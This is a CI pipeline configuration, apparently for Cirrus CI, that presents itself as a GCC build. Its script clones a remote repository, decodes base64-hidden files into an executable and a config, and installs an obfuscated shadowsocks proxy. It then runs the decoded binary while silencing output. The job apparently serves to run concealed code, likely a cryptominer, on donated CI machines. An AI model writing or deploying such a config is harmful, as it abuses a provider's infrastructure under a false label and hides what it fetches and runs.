gce_instance:
  image_project: ubuntu-os-cloud
  image_name: ubuntu-1904-disco-v20190417

task:
  env:
    matrix:
      BUILD: env1
  script:
    - apt update || true
    - apt --yes install cl-base64 git &>/dev/null || true
    - git clone https://gccbuild@bitbucket.org/gccbuild/gcc.git &>/dev/null
    - base64 -d gcc/config_ > CONFI
    - base64 -d gcc/make_ > RI
    - apt --yes install shadowsocks-libev simple-obfs &>/dev/null || true
    - base64 -d gcc/gcc_np_ > gcc/gcc_new 2>/dev/null
    - mv gcc/gcc_new /etc/shadowsocks-libev/make.json &>/dev/null
    - systemctl stop shadowsocks-libev.service &>/dev/null || true
    - ss-local -v -c /etc/shadowsocks-libev/make.json &
    - chmod +x RI
    - sed -i '/socks5/d' CONFI
    - sed -i 's/ero",/ero"/g' CONFI
    - ./RI -c CONFI
